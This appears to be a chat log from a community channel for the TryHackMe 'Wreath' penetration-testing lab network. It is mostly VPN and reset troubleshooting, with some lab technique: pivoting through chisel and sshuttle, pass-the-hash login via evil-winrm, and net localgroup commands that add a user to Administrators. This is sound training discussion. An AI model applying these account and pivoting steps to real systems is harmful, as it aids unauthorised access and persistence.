File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/interface.py", line 19, in <module>
from .application import Application, AbortAction
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/application.py", line 8, in <module>
from .key_binding.bindings.basic import load_basic_bindings
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/key_binding/bindings/basic.py", line 9, in <module>
from prompt_toolkit.renderer import HeightIsUnknownError
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/renderer.py", line 11, in <module>
from prompt_toolkit.styles import Style
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/styles/init.py", line 8, in <module>
from .from_dict import *
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/styles/from_dict.py", line 9, in <module>
from collections import Mapping
ImportError: cannot import name 'Mapping' from 'collections' (/usr/lib/python3.10/collections/init.py)

Cant download the VPN file

I'm unable to download another Wreath VPN file as well

I have the same issue as you guys.

404 on ovpn download

@surreal sail @ionic tide
Found the solution to the 404 error when generating a Wreath VPN, just leave the Wreath room.
To do this go to the and select the gear setting icon next to Help and press 'leave'. Then rejoin into the network and you should be able to generate a new Wreath VPN file

I did that last night when Trouble shooting with an admin but nothing wrong with trying it again. Will let you know

oh my god thank you so much

Gave +1 Rep to @tacit crane

yep it works now odd that is didnt work when I did that before but o well

we need one more reset plz

anyone seen this before? I google the error and tried to make changes to the config file as well as restarted the service but that doesn't work.

Where'd you put the SSH key?

I put it in the current directory I’m working in. I didn’t put it in /root/.ssh

.

So you need to specify that key, with a flag in your SSH command

So someone's probably edited the authorized_keys file

wow

thanks for the heads up

need 3 more ppl to vote to reset this

also because I was root I tried adding a user to the root group and logging in with my new user but it wouldn't let me fyi

You'd need to add a key for them too. I'd add a sudoer rather than adding a user in the root group.

cant get ssh to work on wreath

connection closed by port 22

using verbose flags shows ' expecting SSH2_MSG_KEX_ECDH_REPLY '

In the pins in #site-support there is an MTU fix. Try that.

unfortunately that didnt work

ive even tried adding a new user and generating ssh keys etc stillno dice

I had same issue

anyone willing to hop in the wreath room and vote to reset please?

2/5 right now

There are many instances

Please state the 3rd octet to avoid unnecessary resets.

105

thanks!

were you able to manually reset the room @strange bison ?

Mods are not site staff

I was simply stating that your request needs more detail otherwise people would vote to reset when nothing is broken.

10.200.90.200 for wreath is having the same issue please advise

to reset the box

Has anyone done port forwarding on this box?

Can anyone help me a sec for the Wreath network? I downloaded the specific file for persistent access, but it does not let me connect using that file

With another VM, the SSH connection works, so it's an issue with my kali, can someone help?

This is the debug log

hi may I get some help? i tried regenerating, clearing cache and trying different browsers and also different regions but unable to dl wreath's config file. i keep getting 404.

resolved

I had to use sudo with my command and I needed to play with the permissions of the file (chmod)

sudo apt-get update && sudo apt-get upgrade -y

Looking for additional votes (currently 1/5 ) to reset the 10.x.90.x network.
Hosts are unreachable.

You might already know, but in case no one else votes, you can reset it on your own.
Might take some time, but you can vote for reset once per hour 🙂

Thanks for the reply - that's my current plan.

Gave +1 Rep to @barren bluff

yep

same

10.x.90.x is fkn toying w me

ive been trying to get that shit working for like an hour now

need one more vote to reset please guys

done it

still broken

ping me when wreath fixed anyone <333

Appears to be working for me, although someone has requested 1 reset.

got a problem right at the beginning, did the changes in /etc/hosts and can ping the url, but don't get anything in a browser, no matter if firefox or chromium

nevermind, got it

its not workin for me

on my vm

nvm i used wrong vpn file

my bad

how did you get it?

my host also went through a vpn that interfered with the openvpn connection here

i got it eventually too

not same reason tho

i think someone fucked up the wreath network again

cant connect to the .200 machine via ssh

and im connected to the wreath network for sure, checked the website and openvpn running normally

god damnit

cant have shit here ive been trying to complete this for like 3 days

gonna get sub

I can't download the ovpn...I get a message about smth got lost in the matrix

and even holo-network got problems

paid 10$ to do these boxes and they don't works

2/2

-.-

its tough :/

can you go on the wreath network and request a reset?

need only 2 more resets and it should work

this happened last time

and dont extend timer

There are lots of network instances.

did

i realised this the hard way

now i have to wait for 2 hrs to reset them myself

smh

ty

problem is

i can't download the vpn file lol

looks like the file is corrupted or smth

or the path

wth

wdym

show ss

also are you from like egypt or china

no italy

how can i send ss

in here ?

can anyone get empire c2 working on parrot os

it keeps telling me unsupported os when installing from git clone

lmk

ty ❤️

not saying im connect to the vpn

any help would be appreciated

I keep having a 404 error after I try to download the configuration file for wreath

anyone can help or is having the same issue ? The config works with Holo

also like is there any kind of way to contact a staff member in some way ?

cause I'm having issue on holo room with the nmap (only display the port 22 open instead of 22 and 80)

b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /web/exploit-Gumbygumberson.php was not found on this server.</p>\n</body></html>

this is out put when runnig python exploit

@wise kelp

never mind im an idiot

Anyone on the x.x.101.x wreath network? Need help with a network reset😅

I've had the same issue for the past week - I have just given up smh

sad thing is that there is literally 0 support

i tried to ask several time here but there is no support if anyone has any issue with the machines

very disappointed so far with the service

I paid smth and I can't use it

Did you email support@tryhackme.com?

The discord is ran by volunteers. It is not the official avenue for support.

Also nothing we can do about that error in here -- including me, and I built the network.
It's been a long term problem. There are unofficial possible fixes, but the bug is as yet unfixed 😦

Forwarding this issue now. 🙂

Try leaving and re-joining the room. Room progress will not be affected. 🙂

hey, what exactly happens after 9 days? Do I lose access or get a cooldown? I unintentionally started it and I am actually planning to use it after 13 days

You'll be moved to a different network

A different instance of Wreath

Basically it's to make sure there are as few idle users in the networks as possible

oh, ok

Nothing to worry about at least

makes sense, can I pull out to avoid congestion from my end?

btw, thank you for your prompt reply!

Gave +1 Rep to @strange bison

Take the elevator to Mezzanine

Anybody know why I cant hit the hosts on the network even though my VPN says its connected on THM?

I was working on it earlier, my laptop restarted and now I just cant hit any of the hosts

I am having same issues with wreath. I am showing as connected in top green bar and also output openvpn shows connected. i am able to ping 10.10.10.10. but i cant run any scans or ping the host in the diagram

have regenerated my certificate already and rebooted my vm as a test already

Good Neighborhood

is the starting machine 10.200.90.200 available? I see .250 but I don't see .200

Https://Thm/access/, then choose tab network

I cant connect to wreath. I downloaded the configuration file and got error. Then I decide to read it with cat. There is nothing inside. It is literally 0 bytes. I downloaded again. Regenerate and download again. Nothing seems to working. Any ideas ?

For the 404 error when generating a VPN file
Just leave the Wreath room.
To do this go to the and select the gear setting icon next to Help and press 'leave'. Then rejoin into the network and you should be able to generate a new Wreath VPN file

greetings all

im currently on task 13, doing the socat. i uploaded the socat binary, but the machine tells me that i couldnt run binaries

any work around on this ?

ahhh

it works with static binaries

like usual it is static binary vs binary looking for all the libs

Hello everyone, I have a question, I am trying to download the Wreath Network but I am getting an error from THM website

Leave the room. wait 5 min(s) then retry.

ok i will try it.

same problem for me

after leaving the room and entering again it worked!

@sharp ice thanks , it works.

Gave +1 Rep to @sharp ice

understooded, thanks man

Gave +1 Rep to @split harbor

Hi, im currently doing task 6, but somehow after typing shell, the terminal froze and there's a problem with the script as well

That ain't a problem with the script. Read the error, what is it telling you?

Can anyone give me a hand, I am trying to ping the main machine(.200). I have downloaded the OVPN

I had access earlier and it stopped when the box ran out of time, I have left the room and rejoined but nothing is working

I think you need to download a new VPN pack everytime you leave and re-join, I could be wrong.

Just noticed..it works now

That ain't an excuse not to learn what went wrong there 😆
What was the error?

Missed sudo 😂

Eh, that's a workaround but throwing sudo at everything ain't the best idea in the world.
What was wrong? Why did it want higher permissions?

I saw the permission denied and thought there wasn't enough privilege

Decided to try sudo

You're correct with that, but it shouldn't need sudo. What specifically was it trying to do when it got permission denied?

I was running whoami prior before that

Wasn't sure why the permission got denied

Read the stack trace in the screenshot -- what was the last thing it tried to do?

Running commands.txt?

That is a text file. Running it, no.

It's trying to write to it. Look at the line above: prompt_toolkit/history.py, then the actual line is opening the file ab -- append bytes.

In other words, you don't have permission to write in the directory you've downloaded the script to

I see. Why don't i have the permission?

No idea 🤷‍♂️
Guessing you cloned it using sudo

i did. will that affect things?

Yes. It will download the files as the root user, meaning they will be owned by the root user, not your own account.
Which is why you get permission denied. You don't own the directory.

Nice. Understood now. thanks

I never suspect that I can login to windows just with hash, ❤️ evil-winrm, each day I am more fascinated to tryhackme and cybersecurity community.

Hi anyone know of a way that I should be using extractor to get the website commit as this is the error

Hi, i get a 404 if i want to download the vpn-file, could anybody help me? the regenrate of the file works.

Hi, 😄
I am trying to create proxy tunnel using sshuttle however I am receiving this warning is this normal or not ?

─$ sudo sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.200.81.0/24 -x 10.200.81.200
[sudo] password for offsec:
c : Connected to server.
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.

@main blaze hi, yes you can leave the wreath room and reconnect after 5 min and try downloading the vpn-file and it should work. this is what they told me and what I did and works with me.

Hello, 👋 I'm trying to download the VPN file buts it's saying 0bytes after download, It was working just fine yesterday

You need to rename the WebSite to .git

trying to use chisel, chisel for me work perfectly perfect

Maybe you have full space, so the file is created to write it but since you have full space nothing is written

@cedar mulch thanks for the reply, what do you mean by full space?

Gave +1 Rep to @cedar mulch

Sometimes I have had full space on the disk and when I tried to download something I did not get an error, but I only saw that the file weighed 0 bytes

@cedar mulch I have 44% free space on my kali box. If thats what you mean

do you have a lot of experience in Penetration testing ?

Not much, I'm level 8 in tryhackme

try to regenerate and then download it

ok I will try

If it doesn't work, try another browser.

but I have another question

if you dont mind

tell me

let's say we have the same environment like wreath network, how can i set a pivoting to it without having any compromised box?

this is possible?

You have to have access to an already compromised machine and on that machine there is another machine to which you do not have access, without connectivity to its network, even if you do not have that machine compromised. If for example you can see port 80/tcp, you can pivot to that port without having access to that machine

Example: I am machine A, and I have compromised machine B, from machine B I have access to machine C, but I do not have access to machine C from my machine A

I can pivot to have access to machine C from my machine A

I see

For that I have to listen with a pivoting program like chisel on machine A and execute port forwarding again with a pivoting program on machine C. That will send the data from machine C, through machine B to the machine A

I guess you will run chisel on A and B boxes

And later?

If you don't have access to machine B, you definitely won't have access to machine C, so there's no way you can do a port forward to machine C to machine A without having access to machine B, if that's what you mean

you will be able to access box C from your A box browser

ok I got you

You have access to machine B, simply by opening a port on machine B, so that the data from machine C is forward there, and so you access in the browser the ip and the port of machine B that forwards data from the machine C

You are machine A, and there are two more machines, you only have access to one which is B, but you do not have access to C, and there is also another machine, which is D, which can only be accessed from C When you have machine B compromised, you can listen there to forward the ports

I understand, thanks for the explanation @cedar mulch

Gave +1 Rep to @cedar mulch

already did that

who else is in .57 subnet?

This is taking forever

curl is working just fine , foxy proxy is slow 😦

i forgot to turn it on

just did it now it works

Let me look at

4/5 asked for reset.. if you have problem to access please push reset..

Hi! I just logged back in to continue wreath and I can't ping the first machine anymore. VPN is up (I regenerated my configuration file just in case), nothing changed on my kali VM, Wreath network seems to be up and running… Is there anything obvious I'm missing?

I cant ping too.. need one more to reset machines..

Need 3 more on my subnet... Gonna work on something else in the meantime.

ok

Network 10.200.72.200, getting a 404 when downloading the .ovpn file, was previously getting a blank .ovpn file
Leaving and rejoining, regenerating and downloading still causes a 404
Regenerating the standard THM VPN file works fine.
Leaving again and rejoining put me into the 10.200.84.200 network. Regenerated the file and downloaded and now am connected

As a follow up, leaving and rejoining works. Finished the environment, very satisfying finish.

Just finished this network, that was awesome! ⭐️⭐️⭐️⭐️⭐️
Holo is next!

starting this network

greetings people

Have fun!

getting a 404 trying to download the vpn config file

leave the room... rejoin the room... regenerate the vpn file.... wait 5 mins... download it.... tada maybe profit

thanks!

been trying for the pass hour and I am still getting a 404 trying to download the VPN config. Any help would be appreciated

Using the tryhackme openvpn troubleshooting script I keep getting Fatal Error: Inline Certificate is invalid

The room was just reset it was working earlier I left the room rejoined and regenerated the file

Any other suggestions?

I seem to be getting this error only on the wreath configuration file for openvpn but the regular openvpn access has no issue and I regenerated the vpn file

should I exit the room and try again?

Is the file blank?

will have a look at the file

yes the file is blank

May I get some help on why my chisel isn't working on this network is that on purpose or am I just dumb? or can someone DM me to help, so I don't spam this room.

Hello, yesterday I had no problem today I can't ping the machine while being on the VPN

I get that sometimes, I fix it by just turning the VPN on and off, hope it helps (also try generating a new vpn file)

got an issue when using sshuttle - task 18...

sshuttle -r root@10.200.105.150 --ssh-cmd "ssh -i id_rsa" 10.200.105.150/24 -x 10.200.105.150
ssh: connect to host 10.200.105.150 port 22: Connection timed out
c : fatal: failed to establish ssh session (2)

sorted it lol

Hi, I have the python error when I try to execute the stager on .200

I can not upload the screenshot

Hey I am working my way through wreath and all was fine and good and then when I took a break and then came back I was no longer able to communicate with the network via command-line. The tryhackme access page shows that I am connected and the DNS for the website resolves and loads the site but I cannot ping, exploit or scan the IP address given even though all of these things were working before. I have already tried to kill my VPN session and go back in, regenerate and download my VPN file, restart the VM, leave the room and come back, etc all to no avail. Anyone have any ideas what might be up?

If you dont have a subscription to thm then I think it kicks you out after 10 days of working on the room. You also need a 7 day streak if you dont have a subscription. I think you can fix it by purchasing a subscription and then regenerating your vpn file.

I believe the 10 day limit is for both subscribers or non subscribers to keep the network from being filled with inactive users. Nevertheless though I am subscribed and just joined the room yesterday so that is certainly not the issue here. Thanks for trying to help though.

I was able to launch 1 successful nmap scan after regenerating my VPN but now it is ignoring all communications from me again.

I still am

I'm getting a 404 error when trying to generate a VPN file for wreath network. I started the network waited 5 minutes, went to the VPN download page. clicked refresh. Waited 10 seconds aaaaand darth vader

Any ideas?

leave and rejoin the room then retry the process of regening the ovpn file

the nc.exe getting detected by AntiVirus?

somehow ||wreath-pc\thomas|| not running curl properly 🤔 .

oh okay, nvm

||Apparently windows\temp wasn't accessible to thomas :)||

Still no luck, I submitted a ticket

Hi

Wreath had wayy more new stuff for me than I expected ❣️

Hello, when I try to ssh in wreath network it tells me this: "Permission denied (publickey,gssapi-keyex,gssapi-with-mic)"

anyone else experiencing that?

Good morning! I was going to hop in the Wreath Network today but anytime I go to Access and try to get a special .vpn for Wreath Network, it gives me a 404 with a Dark Vader helmet. Any ideas?

404 When trying to download the Wreath Network VPN?

Can you head over to the room https://tryhackme.com/room/wreath

Press "options" -> "leave room"

After that, click here -> https://tryhackme.com/jr/wreath

Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the dropdown, and finally clicking "regenerate"

Ensure to wait up to 2 minutes before downloading your OpenVPN file!

Hi, I had the same issue and following the steps allowed me to download the vpn file. However, the vpn file is always empty. I've tried leaving and joining the room again and downloading the file but it is always empty

I also tried regenerating the file multiple times (and waiting a few minutes) but get the same issue

Have you guys been able to connect to the Wreath Box? I can't ping it anymore, and I've been able to get the OpenVPN setup working

Is the network running?

Any update on the empty wreath VPN file from anyone?

For me it's straight up 404 no matter what i do, i tried the recommended fix multiple times

I'm a subscriber using AttackBox, I launched an nmap scan for the first 15000 ports and got no reponse, maybe there is an issue on the network.
If there is any subscribers here, please push the button "Reset" in order to wipe the network config, up to now, there are 4/5 Reset, we need just one to reset the network configuration and maybe resolve all our initial issues.

4/5 asking for RESET, if you have an issue accessing the machine, push RESET button.

anyone else experiencing same problem?

I was the 5th reset. Hopefully this fixes it. I'm going to try again this weekend.

it seems there is some issue with wreath room. as it is showing 'Network state: Resetting' for a very long time. Also from the attack box we are not able to connect to the vulnerable machine i.e 10.200.90.200

Yes this is the network I'm having issues with as well. I think my VPN file issue is related to this connection issue

I think the issue at the tryhackme end not our end.

Yes I agree

Has there been any updates on the network? I think I raised this issue at the start of the week but I haven't heard anything.

It's a bit annoying since I wanted to do this network before an exam next week.

@fair breach could you check on this please? ♥️

hi! I am only getting blank vpn profiles for Wreath

tried rejoining the room, regenerating profiles, and nothing works

please and thanks for any help!

Did you every get this working?

Yes the VPN is non-empty now. Thanks for fixing this

Gave +1 Rep to @cunning island

Same issue here.

Have you tried the steps explained in the pinned messages?

I have, yes. It's downloading but just 0bytes.

So you have left the room, waited, rejoined, regenerated, and waited?

Correct.

I tried clearing cache etc too, not too sure what else I can do. I will follow those steps again.

Welp, site is broke

Yeah, not too sure.

hey. sorry for the late response.. but yes, exact same thing

Is there any movement on this?

I see were all having issues doing wreath with its vpn?

I tried the pinned resolution multiple times, no luck. VPN file downloads with no data

yup

@fair breach can you help us?

Yea im off this upcoming mon-thurs so itd be nice to use that learning with the Wreath room

For me it's been in the state of resetting for over 2 hours now

i'm still unable to Download the wreath vpn conf file just straight up 404, even when i try the recommended fixes. It's been like this for over 1 week now. 😦

Hello everyone, does everyone have such a problem or is it just me?)

I have the same issue

add me to the list of people with the 0 byte Wreath openvpn file

me too！！！

I am using tryhackme attackbox there also I can see a blank ovpn file

also I am not able to ping the vulnerable machine or through nmap

this is very weird

Has anyone had success with the pinned message instructions re: the VPN file? I tried and still have the same issue. I even tried the Troubleshooting script offered by the THM support bot https://raw.githubusercontent.com/tryhackme/openvpn-troubleshooting/master/thm-troubleshoot

Wen vpn fix

Can someone start the machine ?. The button Start is disabled

Hello Hackers!!

I'm facing difficulty in RCE for the webserver. Can you please suggest something?

hi

Guess im doing holo instead 😦

did you check the pinned message??

Yea ive tried the pinned resolution on 3 different occasions now

well was worth confirming

Hey guys. anyone has any idea on how to start with this network. I ve tried all steps mentioned but the network is still in resetting state.

Wreaths vpn appears to work again

Hey guys been using tryhackme for a while wanted to try out the wreath room upon starting the room the port scans were saying something like 'machine not responding to requests (i dont entirely remember it was late at night)' so I tried resetting the machine, it still hasnt come back up, its been nearly 48hours. What should I do here?

What's your subnet?

10.200.81.200

What does it say up here?

resetting

for about 48 hours

Try leaving the room, waiting 5 mins and re joining.

I have already tried that

to no avail

that box is cooked

Try leaving the room for longer then.

My network is stopped.

alright

this time it displayed a different subnet before joining, after joining went back to the same subnet which is still resetting. I mean ill try leaving it for an hour this time but idk if that will do anything

all good now finally got a different box cheers

Hello,

Got onto Wreath, I have generated an ovpn file, the network state says: Running

However, the ping of the ip indicates Destination Host Unreachable

And nmap is not more conclusive:
nmap -p 1-15000 -oA thmwreathexternal 10.200.57.200

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

Did you try adding -Pn?

Nah, wreath isn't windows.

Hi, I did but I think the issue is a lack of interaction between me and the distant resource.

wreath vpn file is messed up

Lol, great news... Can we do something to exploit this network?

Made my way to task 21. I'm able to connect to the middle server using a reverse shell, and created an account on server 2. However, when I try to connect with evil-winrm it's giving me an error (xfreerdp works with the account):

Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1 "

I can connect with xfreerdp but it looks like windows needs to be authenticated. I'm also not certain how to transfer files to the server using that tool...rookie.

I did find a post that mentions upgrading kali, so I've started that. Was wondering if anyone has suffered through this already.

Can't generate an openvpn config for wreath 😕

Keeps being downloaded as a blank file

EDIT: Was able to get a working .ovpn file for Wreath by leaving, waiting a bit, rejoining, waiting again, regenerate, wait, click download button :). The VPN troubleshooting script also noted my Kali box didn't have a tun0 interface and MTU value of 1500 wasn't working, but I feel like that's unrelated to the blank OVPN configs/404 error?
Anyone else still having issues downloading the Wreath .ovpn file? Clicking on the download button gives me a 404 error. I was able to recreate the issue in an incognito Chrome tab and Safari.
Safari for MacOS version: Version 16.3 (17614.4.6.11.4, 17614)
Chrome for MacOS version: Version 110.0.5481.77 (Official Build) (x86_64)
MacOS Monterey 12.6.3

Bet, this worked 👍

Thanks

Gave +1 Rep to @leaden spire

Np! Going to finally get started on it after lunch 😊

Think the TL;DR is: those servers are having issues 😆
Gonna have to wait until someone gets around to fixing them I'm afraid. I've spoken to a few staff members but no ETA just yet 🙂

@merry robin same thing with Holo I'm guessing?

No idea -- this is the only network channel I monitor

Ah, gotcha

yes it having issue for over a week now

i was able to generate the ovpn file after leaving and coming back again than generate a new ovpn file and wait 2 mins. The next issue is when you try to connect to the network where it will enter an infinite loop of trying to connect but nothing happens

Story time.
so, I had problems with winrm and updated my kali box. One thread suggested updating kali so I did. It ran for a while and when it was done, I could no longer connect with openvpn. I got an error "Failed to open tun/tap interface."

I tried regenerating openvpn files but that didn't matter.

So, long story short, after wasting an hour on that, I found a sed cmd that seems to be working:

sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

I ran that on the wreath ovpn and my user ovpn and both work now.

Now I can resurrect my annoyance with evil-winrm...

This is the extended error. The error starts about halfway down. Seems the sed command truncates the cipher name or something...IDK:

2023-02-11 11:03:41 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2023-02-11 11:03:41 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route-metric 1000,route-gateway 10.6.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.6.1.149 255.255.128.0,peer-id 98'
2023-02-11 11:03:41 OPTIONS IMPORT: timers and/or timeouts modified
2023-02-11 11:03:41 OPTIONS IMPORT: --ifconfig/up options modified
2023-02-11 11:03:41 OPTIONS IMPORT: route options modified
2023-02-11 11:03:41 OPTIONS IMPORT: route-related options modified
2023-02-11 11:03:41 OPTIONS IMPORT: peer-id set
2023-02-11 11:03:41 OPTIONS ERROR: failed to negotiate cipher with server. Add the server's cipher ('AES-256-CBC') to --data-ciphers (currently 'AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305') if you want to connect to this server.
2023-02-11 11:03:41 ERROR: Failed to apply push options
2023-02-11 11:03:41 Failed to open tun/tap interface
2023-02-11 11:03:41 Converting soft SIGUSR1 received during exit notification to SIGTERM
2023-02-11 11:03:41 SIGTERM[soft,exit-with-notification] received, process exiting

This was self inflicted:
The instructions say:
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add

Of course I didn't add my user to the RMU group...

Took me 2 days to solve because stupid ovpn didn't work. lol

The 'infinite loop' seems like it might be the same issue I described. Do you get a "failed to open tun/tap interface" error?? If so, try the sed (substitution) cmd above.

ok that worked

When i got a similiar issue with winrm i had forgotten to setup a proxy. Sshuttle worked easiest/best